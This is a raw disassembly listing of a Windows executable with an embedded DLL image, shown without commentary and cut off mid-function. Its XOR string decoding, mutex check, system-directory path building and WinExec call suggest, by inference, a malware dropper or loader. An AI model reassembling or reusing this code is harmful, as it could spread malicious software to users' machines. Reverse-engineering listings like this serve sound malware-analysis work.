dd 2000h, 10000000h, 1000h, 200h, 1, 0
dd 4, 0
dd 8000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 7000h, 48h, 5000h, 37Ch, 6 dup(0)
dd 6000h, 0DCh, 3000h, 54h, 12h dup(0)
a_text db '.text',0
align 4
db '',7,0
align 10h
dd 1000h, 7BCh, 400h, 3 dup(0)
dd 60000020h, 7373622Eh, 0
dd 0FE0h, 2000h, 5 dup(0)
dd 0C0000080h, 6164722Eh, 6174h, 54h, 3000h, 54h, 0C00h
dd 3 dup(0)
dd 40000020h, 7461642Eh, 61h, 0C4h, 4000h, 0C4h, 0E00h
dd 3 dup(0)
dd 0C0000040h, 6164692Eh, 6174h, 37Ch, 5000h, 37Ch, 1000h
dd 3 dup(0)
dd 0C0000060h, 6C65722Eh, 636Fh, 0E4h, 6000h, 0E4h, 1600h
dd 3 dup(0)
dd 2000020h, 6164652Eh, 6174h, 48h, 7000h, 48h, 1800h
dd 3 dup(0)
dd 40000020h, 5Ch dup(0)
dd 8B40C031h, 0F704244Ch, 60441h, 0F740000h, 824448Bh
dd 1024548Bh, 3B80289h, 0C3000000h
; =============== S U B R O U T I N E =======================================
sub_43D5BC proc near ; CODE XREF: .data:0043D6E4�p
; .data:0043D712�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push 10001000h
push large dword ptr fs:0
mov large fs:0, esp
loc_43D5D9: ; CODE XREF: sub_43D5BC+44�j
; sub_43D5BC+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_43D608
cmp esi, [esp+1Ch+arg_4]
jz short loc_43D608
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_43D5D9
call dword ptr [ebx+esi*4+8]
jmp short loc_43D5D9
; ---------------------------------------------------------------------------
loc_43D608: ; CODE XREF: sub_43D5BC+2A�j
; sub_43D5BC+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_43D5BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D616 proc near ; CODE XREF: .data:0043D6D7�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push 10001092h
push [ebp+arg_0]
call sub_43DCB0
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_43D616 endp
; ---------------------------------------------------------------------------
db 0FCh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
test dword ptr [eax+4], 6
jnz loc_43D70B
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_43D669: ; CODE XREF: .data:0043D702�j
cmp esi, 0FFFFFFFFh
jz loc_43D71A
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_43D6F9
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov ds:10004034h, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov ds:10004038h, eax
mov eax, [edx+4]
mov ds:1000403Ch, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, ds:10004040h
mov esi, ds:10004038h
rep movsd
lea edi, ds:10004040h
mov ds:10004038h, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_43D6F9
js short loc_43D707
mov edi, [ebx+8]
push ebx
call sub_43D616
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_43D5BC
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_43D6F9: ; CODE XREF: .data:0043D67A�j
; .data:0043D6CF�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_43D669
; ---------------------------------------------------------------------------
loc_43D707: ; CODE XREF: .data:0043D6D1�j
xor eax, eax
jmp short loc_43D724
; ---------------------------------------------------------------------------
loc_43D70B: ; CODE XREF: .data:0043D64E�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_43D5BC
add esp, 0Ch
loc_43D71A: ; CODE XREF: .data:0043D66C�j
push 0Bh
call sub_43DD1C
add esp, 4
loc_43D724: ; CODE XREF: .data:0043D709�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 1
jnz short loc_43D73D
call sub_43D760
loc_43D73D: ; CODE XREF: .data:0043D736�j
call sub_43DC0F
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
mov eax, ds:10004000h
call eax
pop edi
pop esi
pop ebx
leave
retn 0Ch
; ---------------------------------------------------------------------------
db 0B8h, 1, 0
dd 0F2EB0000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D760 proc near ; CODE XREF: .data:0043D738�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push 0
push 0FFFFFFF6h
call sub_43DCD4
mov [ebp+var_8], eax
push 0
push 0FFFFFFF5h
call sub_43DCD4
mov [ebp+var_4], eax
push 0
push 0FFFFFFF4h
call sub_43DCD4
mov [ebp+var_C], eax
push 1000401Eh
push [ebp+var_8]
call sub_43DCC8
mov ds:10004008h, eax
push 1000401Ch
push [ebp+var_4]
call sub_43DCC8
mov ds:10004004h, eax
push 1000401Ch
push [ebp+var_C]
call sub_43DCC8
add esp, 30h
mov ds:1000400Ch, eax
mov edi, ds:10004004h
or edi, edi
jz short loc_43D7D9
push 0
push edi
call sub_43DD28
add esp, 8
loc_43D7D9: ; CODE XREF: sub_43D760+6C�j
mov edi, ds:1000400Ch
or edi, edi
jz short loc_43D7F3
push 0
push edi
call sub_43DD28
add esp, 8
call sub_43D7F8
loc_43D7F3: ; CODE XREF: sub_43D760+81�j
pop edi
leave
retn
sub_43D760 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D7F8 proc near ; CODE XREF: sub_43D760+8E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_C], 0
call sub_43DC44
mov ebx, eax
mov [ebp+var_10], ebx
jmp short loc_43D835
; ---------------------------------------------------------------------------
loc_43D814: ; CODE XREF: sub_43D7F8+45�j
cmp byte ptr ds:0[ebx], 3Dh
jz short loc_43D821
inc [ebp+var_C]
loc_43D821: ; CODE XREF: sub_43D7F8+24�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
lea ebx, [ebx+edi]
loc_43D835: ; CODE XREF: sub_43D7F8+1A�j
cmp byte ptr ds:0[ebx], 0
jnz short loc_43D814
mov edi, [ebp+var_C]
inc edi
lea edi, ds:0[edi*4]
mov [ebp+var_14], edi
push [ebp+var_14]
call sub_43DCF8
pop ecx
mov [ebp+var_8], eax
mov ds:10004010h, eax
cmp [ebp+var_8], 0
jnz short loc_43D868
xor eax, eax
jmp short loc_43D8DE
; ---------------------------------------------------------------------------
loc_43D868: ; CODE XREF: sub_43D7F8+6A�j
mov ebx, [ebp+var_10]
jmp short loc_43D8C1
; ---------------------------------------------------------------------------
loc_43D86D: ; CODE XREF: sub_43D7F8+D1�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
mov [ebp+var_4], edi
cmp byte ptr ds:0[ebx], 3Dh
jz short loc_43D8BB
push [ebp+var_4]
call sub_43DCF8
pop ecx
mov esi, [ebp+var_8]
mov ds:0[esi], eax
or eax, eax
jnz short loc_43D8A4
jmp short loc_43D8DE
; ---------------------------------------------------------------------------
loc_43D8A4: ; CODE XREF: sub_43D7F8+A8�j
push ebx
mov edi, [ebp+var_8]
push dword ptr ds:0[edi]
call sub_43DD4C
add esp, 8
add [ebp+var_8], 4
loc_43D8BB: ; CODE XREF: sub_43D7F8+91�j
mov edx, [ebp+var_4]
lea ebx, [ebx+edx]
loc_43D8C1: ; CODE XREF: sub_43D7F8+73�j
cmp byte ptr ds:0[ebx], 0
jnz short loc_43D86D
mov edx, [ebp+var_8]
mov dword ptr ds:0[edx], 0
mov eax, 1
loc_43D8DE: ; CODE XREF: sub_43D7F8+6E�j
; sub_43D7F8+AA�j
pop edi
pop esi
pop ebx
leave
retn
sub_43D7F8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D8E4 proc near ; CODE XREF: sub_43D98E+22�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 181h
push esi
push [ebp+arg_0]
mov eax, ds:10004098h
lea eax, ds:10002000h[eax]
push eax
call sub_43DD04
add esp, 0Ch
xor edi, edi
jmp short loc_43D92D
; ---------------------------------------------------------------------------
loc_43D913: ; CODE XREF: sub_43D8E4+4B�j
mov eax, ds:10004098h
add eax, edi
lea eax, ds:10002000h[eax]
movsx edx, byte ptr [eax]
xor edx, 0D9h
mov [eax], dl
inc edi
loc_43D92D: ; CODE XREF: sub_43D8E4+2D�j
cmp edi, esi
jl short loc_43D913
mov [ebp+var_8], 389h
mov eax, ds:10004098h
add eax, esi
mov byte ptr ds:10002000h[eax], 0
xor edi, edi
mov edi, ds:10004098h
add dword ptr ds:10004098h, 3
mov eax, ds:10004098h
lea eax, [eax+esi+4]
mov ds:10004098h, eax
inc dword ptr ds:10004098h
cmp dword ptr ds:10004098h, 0DB6h
jle short loc_43D97D
and dword ptr ds:10004098h, 0
loc_43D97D: ; CODE XREF: sub_43D8E4+90�j
mov [ebp+var_C], 9Ch
lea eax, [edi+10002000h]
pop edi
pop esi
leave
retn
sub_43D8E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D98E proc near ; CODE XREF: .data:0043DB27�p
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
lea edi, [ebp+var_5]
lea esi, ds:1000409Ch
xor ecx, ecx
inc ecx
rep movsb
call sub_43DC80
push 5
push 100040BDh
call sub_43D8E4
add esp, 8
push eax
push 0
push 1F0001h
call sub_43DCA4
mov [ebp+var_4], eax
or eax, eax
jz short loc_43D9E9
mov [ebp+var_C], 4FA1h
inc [ebp+var_C]
push eax
call sub_43DC5C
mov [ebp+var_E], 6C6Dh
inc [ebp+var_E]
xor eax, eax
inc eax
loc_43D9E9: ; CODE XREF: sub_43D98E+3C�j
pop edi
pop esi
leave
retn
sub_43D98E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D9ED proc near ; CODE XREF: .data:0043DB5B�p
var_10A = byte ptr -10Ah
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
call sub_43DC38
call sub_43DC68
mov ecx, edi
or eax, 0FFFFFFFFh
loc_43DA0B: ; CODE XREF: sub_43D9ED+23�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43DA0B
mov ebx, eax
mov [ebp+var_6], bx
mov ax, [ebp+var_6]
mov [ebp+var_2], ax
jmp short loc_43DA40
; ---------------------------------------------------------------------------
loc_43DA22: ; CODE XREF: sub_43D9ED+59�j
movzx eax, [ebp+var_2]
cmp byte ptr [edi+eax], 5Ch
jnz short loc_43DA3C
call sub_43DC2C
inc [ebp+var_2]
call sub_43DC80
jmp short loc_43DA48
; ---------------------------------------------------------------------------
loc_43DA3C: ; CODE XREF: sub_43D9ED+3D�j
dec [ebp+var_2]
loc_43DA40: ; CODE XREF: sub_43D9ED+33�j
movzx eax, [ebp+var_2]
or eax, eax
jg short loc_43DA22
loc_43DA48: ; CODE XREF: sub_43D9ED+4D�j
mov ax, [ebp+var_2]
cmp ax, [ebp+var_6]
jnb short loc_43DA86
mov [ebp+var_4], 0
jmp short loc_43DA74
; ---------------------------------------------------------------------------
loc_43DA5A: ; CODE XREF: sub_43D9ED+97�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_2]
mov ecx, eax
add ecx, edx
mov dl, [edi+ecx]
mov [ebp+eax+var_10A], dl
inc [ebp+var_4]
loc_43DA74: ; CODE XREF: sub_43D9ED+6B�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_6]
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jle short loc_43DA5A
loc_43DA86: ; CODE XREF: sub_43D9ED+63�j
mov esi, 6BBCh
add esi, 7D41h
lea eax, [ebp+var_10A]
push eax
call sub_43DC98
call sub_43DC8C
pop edi
pop esi
pop ebx
leave
retn
sub_43D9ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43DAA7 proc near ; CODE XREF: .data:0043DBAE�p
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
call sub_43DC38
push 100040BBh
push [ebp+arg_0]
call sub_43DD40
add esp, 8
lea edi, [ebp+var_8]
lea esi, ds:1000409Dh
movsd
movsd
pop edi
pop esi
leave
retn
sub_43DAA7 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 21Ch
push esi
push edi
mov ax, ds:100040A5h
mov [ebp-217h], ax
mov eax, ds:10004094h
add eax, 698h
push eax
call sub_43DD34
mov byte ptr [ebp-100h], 84h
sub byte ptr [ebp-100h], 68h
mov eax, ds:10004090h
mov edx, eax
add edx, 5
push edx
mov edx, 0Fh
sub edx, ds:10004094h
push edx
mov edx, 4
sub edx, eax
push edx
call sub_43D98E
add esp, 10h
or eax, eax
jz short loc_43DB3B
xor eax, eax
inc eax
jmp loc_43DBE4
; ---------------------------------------------------------------------------
loc_43DB3B: ; CODE XREF: .data:0043DB31�j
push 104h
lea eax, [ebp-205h]
push eax
push dword ptr [ebp+8]
call sub_43DC50
call sub_43DC38
lea eax, [ebp-205h]
push eax
call sub_43D9ED
mov byte ptr [ebp-101h], 1Bh
add byte ptr [ebp-101h], 1
lea edi, [ebp-215h]
lea esi, ds:100040A7h
mov ecx, 4
rep movsd
push 0FFh
lea eax, [ebp-0FFh]
push eax
call sub_43DC74
mov eax, ds:100040B7h
mov [ebp-21Bh], eax
call sub_43DC38
call sub_43DC2C
lea eax, [ebp-0FFh]
push eax
call sub_43DAA7
call sub_43DC80
lea eax, [ebp-215h]
push eax
lea eax, [ebp-0FFh]
push eax
call sub_43DD40
add esp, 10h
push 1
lea eax, [ebp-0FFh]
push eax
call sub_43DCBC
call sub_43DC68
xor eax, eax
inc eax
loc_43DBE4: ; CODE XREF: .data:0043DB36�j
pop edi
pop esi
leave
retn 0Ch
; ---------------------------------------------------------------------------
align 4
dd 243CD950h, 0F24048Bh, 82434BAh, 240C8166h
db 0, 2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DC0F
loc_43DBFE: ; CODE XREF: sub_43DC0F+D�j
fldcw word ptr [esp+4+var_4]
pop ecx
mov al, ah
and eax, 3
retn
; END OF FUNCTION CHUNK FOR sub_43DC0F
; ---------------------------------------------------------------------------
dd 243CD950h
db 58h, 0EBh, 0F3h
; =============== S U B R O U T I N E =======================================
sub_43DC0F proc near ; CODE XREF: .data:loc_43D73D�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043DBFE SIZE 0000000A BYTES
push eax
fnstcw word ptr [esp+4+var_4]
mov eax, [esp+4+var_4]
or word ptr [esp+4+var_4], 300h
jmp short loc_43DBFE
sub_43DC0F endp
; ---------------------------------------------------------------------------
align 10h
dd 50E825FFh, 90901000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC2C proc near ; CODE XREF: sub_43D9ED+3F�p
; .data:0043DBA2�p
jmp dword ptr ds:100050ECh
sub_43DC2C endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC38 proc near ; CODE XREF: sub_43D9ED+F�p
; sub_43DAA7+7�p ...
jmp dword ptr ds:100050F0h
sub_43DC38 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC44 proc near ; CODE XREF: sub_43D7F8+10�p
jmp dword ptr ds:100050F4h
sub_43DC44 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC50 proc near ; CODE XREF: .data:0043DB4A�p
jmp dword ptr ds:100050F8h
sub_43DC50 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC5C proc near ; CODE XREF: sub_43D98E+49�p
jmp dword ptr ds:100050FCh
sub_43DC5C endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC68 proc near ; CODE XREF: sub_43D9ED+14�p
; .data:0043DBDC�p
jmp dword ptr ds:10005100h
sub_43DC68 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC74 proc near ; CODE XREF: .data:0043DB8D�p
jmp dword ptr ds:10005104h
sub_43DC74 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC80 proc near ; CODE XREF: sub_43D98E+16�p
; sub_43D9ED+48�p ...
jmp dword ptr ds:10005108h
sub_43DC80 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC8C proc near ; CODE XREF: sub_43D9ED+B0�p
jmp dword ptr ds:1000510Ch
sub_43DC8C endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC98 proc near ; CODE XREF: sub_43D9ED+AB�p
jmp dword ptr ds:10005110h
sub_43DC98 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCA4 proc near ; CODE XREF: sub_43D98E+32�p
jmp dword ptr ds:10005114h
sub_43DCA4 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCB0 proc near ; CODE XREF: sub_43D616+13�p
jmp dword ptr ds:10005118h
sub_43DCB0 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCBC proc near ; CODE XREF: .data:0043DBD7�p
jmp dword ptr ds:1000511Ch
sub_43DCBC endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCC8 proc near ; CODE XREF: sub_43D760+33�p
; sub_43D760+45�p ...
jmp dword ptr ds:10005128h
sub_43DCC8 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCD4 proc near ; CODE XREF: sub_43D760+B�p
; sub_43D760+17�p ...
jmp dword ptr ds:1000512Ch
sub_43DCD4 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
dd 513025FFh, 90901000h, 0
dd 513425FFh, 90901000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCF8 proc near ; CODE XREF: sub_43D7F8+58�p
; sub_43D7F8+96�p
jmp dword ptr ds:10005138h
sub_43DCF8 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD04 proc near ; CODE XREF: sub_43D8E4+23�p
jmp dword ptr ds:1000513Ch
sub_43DD04 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
dd 514025FFh, 90901000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD1C proc near ; CODE XREF: .data:0043D71C�p
jmp dword ptr ds:10005144h
sub_43DD1C endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD28 proc near ; CODE XREF: sub_43D760+71�p
; sub_43D760+86�p
jmp dword ptr ds:10005148h
sub_43DD28 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD34 proc near ; CODE XREF: .data:0043DAF5�p
jmp dword ptr ds:1000514Ch
sub_43DD34 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD40 proc near ; CODE XREF: sub_43DAA7+14�p
; .data:0043DBC6�p
jmp dword ptr ds:10005150h
sub_43DD40 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD4C proc near ; CODE XREF: sub_43D7F8+B7�p
jmp dword ptr ds:10005154h
sub_43DD4C endp
; ---------------------------------------------------------------------------
dw 9090h
dd 14h dup(0)
dd 2 dup(1), 7Ch dup(0)
dd 10001536h, 5 dup(0)
dd 7325h, 720077h, 1Ch dup(0)
dd 2, 0Ch, 0
dd 3B4E2A00h, 734D3E5Ah
db 0, 4Bh, 0
aAbcdefghijklmn db 'abcdefghijklmno',0 ; DATA XREF: sub_403BE7+283�o
aAy_0 db 'Ay&',0
db '\',0
aTtii db '',0
align 10h
dd 4Fh dup(0)
dd 5070h, 2 dup(0)
dd 52F8h, 50E8h, 50B0h, 2 dup(0)
dd 5340h, 5128h, 12h dup(0)
dd 515Ch, 516Ch, 5184h, 519Ch, 51B8h, 51D0h, 51E0h, 51F4h
dd 520Ch, 521Ch, 522Ch, 5240h, 5250h, 525Ch, 2 dup(0)
dd 5268h, 5274h, 5288h, 5294h, 52A0h, 52ACh, 52B8h, 52C4h
dd 52CCh, 52D8h, 52E0h, 52ECh, 2 dup(0)
dd 515Ch, 516Ch, 5184h, 519Ch, 51B8h, 51D0h, 51E0h, 51F4h
dd 520Ch, 521Ch, 522Ch, 5240h, 5250h, 525Ch, 2 dup(0)
dd 5268h, 5274h, 5288h, 5294h, 52A0h, 52ACh, 52B8h, 52C4h
dd 52CCh, 52D8h, 52E0h, 52ECh, 0
dd 78450081h, 72507469h, 7365636Fh, 73h, 654700DEh, 72754374h
dd 746E6572h, 636F7250h, 49737365h, 64h, 654700E0h, 72754374h
dd 746E6572h, 65726854h, 64496461h, 0
dd 654700EDh, 766E4574h, 6E6F7269h, 746E656Dh, 69727453h
dd 4173676Eh, 0
dd 6547010Ah, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
dd 6C43001Bh, 4865736Fh, 6C646E61h, 65h, 65470124h, 6F725074h
dd 73736563h, 70616548h, 0
dd 6547013Fh, 73795374h, 446D6574h, 63657269h, 79726F74h
dd 41h, 65470155h, 63695474h, 756F436Bh, 746Eh, 6547015Ch
dd 72655674h, 6E6F6973h, 0
dd 6C470168h, 6C61626Fh, 41646441h, 416D6F74h, 0
dd 704F01D2h, 754D6E65h, 41786574h, 0
dd 7452020Eh, 776E556Ch, 646E69h, 69570298h, 6578456Eh
dd 63h, 665F0080h, 65706F64h, 6Eh, 6F5F014Fh, 5F6E6570h
dd 6866736Fh, 6C646E61h, 65h, 6366020Dh, 65736F6Ch, 0
dd 635F0039h, 74697865h, 0
dd 616D024Eh, 636F6C6Ch, 0
dd 656D0254h, 7970636Dh, 0
dd 7270025Bh, 66746E69h, 0
dd 61720260h, 657369h, 65730267h, 66756274h, 0
dd 7273026Fh, 646E61h, 74730271h, 74616372h, 0
dd 74730275h, 79706372h, 0
aKernel32_dll_0 db 'KERNEL32.DLL',0
align 4
dd 0Eh dup(10005000h), 44545243h, 442E4C4Ch, 4C4Ch, 0Ch dup(10005014h)
dd 22h dup(0)
dd 20h, 0
dd 20h, 1000h, 1800h, 2000h, 2C00h, 78h dup(0)
dd 1000h, 94h, 3086302Bh, 30F730EDh, 310D30FFh, 311B3113h
dd 31B03121h, 31FD31F0h, 320F3202h, 32243214h, 323F322Ah
dd 335F32BEh, 33783366h, 339D3381h, 33AF33A6h, 33BB33B5h
dd 33CA33C4h, 33DC33D0h, 33FF33EAh, 35183410h, 3543352Ch
dd 356D354Fh, 35DA357Eh, 368635F7h, 369E3692h, 36B636AAh
dd 36CE36C2h, 36E636DAh, 36FE36F2h, 3716370Ah, 372E3722h
dd 3746373Ah, 375E3752h, 3776376Ah, 378E3782h, 37A6379Ah
dd 37B2h, 4000h, 0Ch, 3000h, 5000h, 3Ch, 330C3308h, 33143310h
dd 331C3318h, 33243320h, 332C3328h, 33343330h, 333C3338h
dd 3350334Ch, 33583354h, 3360335Ch, 33683364h, 3370336Ch
dd 33783374h, 4Ah dup(0)
aB_1 db 0Ah
db '|B',0
align 4
aP db '(p',0
align 4
dd 3 dup(1), 7030h, 7034h, 7038h, 2E6C6C64h, 6C6C64h, 1536h
dd 703Ch, 0
a_libmain@12 db '_LibMain@12',0
dd 6Eh dup(0)
db 0
byte_43EB9D db 4Dh, 5Ah, 90h ; DATA XREF: sub_403A5F+CC�o
dd 300h, 400h, 0FFFF00h, 0B800h, 0
dd 4000h, 8 dup(0)
dd 8000h, 0BA1F0E00h, 9B4000Eh, 1B821CDh, 5421CD4Ch, 20736968h
dd 676F7270h, 206D6172h, 6E6E6163h, 6220746Fh, 75722065h
dd 6E69206Eh, 534F4420h, 646F6D20h, 0D0D2E65h, 240Ah, 0
dd 455000h, 4014C00h, 7CA9DF00h, 42h, 0
dd 0E00E000h, 2010B01h, 1A0037h, 180000h, 20000h, 121900h
dd 100000h, 300000h, 40000000h, 100000h, 20000h, 100h
dd 0
dd 400h, 0
dd 600000h, 40000h, 0
dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0
dd 1000h, 2 dup(0)
dd 500000h, 97000h, 1Ch dup(0)
dd 65742E00h, 7478h, 19A400h, 100000h, 19A400h, 40000h
dd 3 dup(0)
dd 2000h, 73622E60h, 73h, 11000h, 300000h, 5 dup(0)
dd 8000h, 61642EC0h, 6174h, 0DE800h, 400000h, 0DE800h
dd 1E0000h, 3 dup(0)
dd 4000h, 64692EC0h, 617461h, 97000h, 500000h, 97000h
dd 2C0000h, 3 dup(0)
dd 6000h, 0C0h, 79h dup(0)
dd 40C03100h, 4244C8Bh, 60441F7h, 74000000h, 24448B0Fh
dd 24548B08h, 0B8028910h, 3
db 0C3h
; =============== S U B R O U T I N E =======================================
sub_43EFBD proc near ; CODE XREF: .data:0043F0F5�p
; .data:0043F123�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_401000
push large dword ptr fs:0
mov large fs:0, esp
loc_43EFDA: ; CODE XREF: sub_43EFBD+44�j
; sub_43EFBD+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_43F009
cmp esi, [esp+1Ch+arg_4]
jz short loc_43F009
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_43EFDA
call dword ptr [ebx+esi*4+8]
jmp short loc_43EFDA
; ---------------------------------------------------------------------------
loc_43F009: ; CODE XREF: sub_43EFBD+2A�j
; sub_43EFBD+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_43EFBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F017 proc near ; CODE XREF: .data:0043F0E8�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset sub_401092
push [ebp+arg_0]
call sub_440755
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_43F017 endp
; ---------------------------------------------------------------------------
db 0FCh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
mov dword ptr ds:loc_404086+6, eax
mov dword ptr ds:loc_40408D+3, ebx
test dword ptr [eax+4], 6
jnz loc_43F11C
mov [ebp-8], eax
